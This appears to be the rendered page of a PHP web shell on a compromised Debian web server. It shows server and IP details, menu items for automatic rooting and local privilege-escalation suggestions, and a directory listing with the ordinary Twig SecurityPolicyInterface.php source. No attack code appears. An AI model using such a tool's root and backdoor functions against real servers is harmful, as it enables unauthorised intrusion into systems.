Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
php /
Twig /
Sandbox /
Delete
Unzip
Name
Size
Permission
Date
Action
SecurityError.php
409
B
-rw-r--r--
2023-02-08 07:49
SecurityNotAllowedFilterError.php
707
B
-rw-r--r--
2023-02-08 07:49
SecurityNotAllowedFunctionError.php
719
B
-rw-r--r--
2023-02-08 07:49
SecurityNotAllowedMethodError.php
868
B
-rw-r--r--
2023-02-08 07:49
SecurityNotAllowedPropertyError.php
884
B
-rw-r--r--
2023-02-08 07:49
SecurityNotAllowedTagError.php
679
B
-rw-r--r--
2023-02-08 07:49
SecurityPolicy.php
3.92
KB
-rw-r--r--
2023-02-08 07:49
SecurityPolicyInterface.php
983
B
-rw-r--r--
2023-02-08 07:49
Save
Rename
<?php /* * This file is part of Twig. * * (c) Fabien Potencier * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Twig\Sandbox; /** * Interface that all security policy classes must implements. * * @author Fabien Potencier <fabien@symfony.com> */ interface SecurityPolicyInterface { /** * @param string[] $tags * @param string[] $filters * @param string[] $functions * * @throws SecurityError */ public function checkSecurity($tags, $filters, $functions): void; /** * @param object $obj * @param string $method * * @throws SecurityNotAllowedMethodError */ public function checkMethodAllowed($obj, $method): void; /** * @param object $obj * @param string $property * * @throws SecurityNotAllowedPropertyError */ public function checkPropertyAllowed($obj, $property): void; }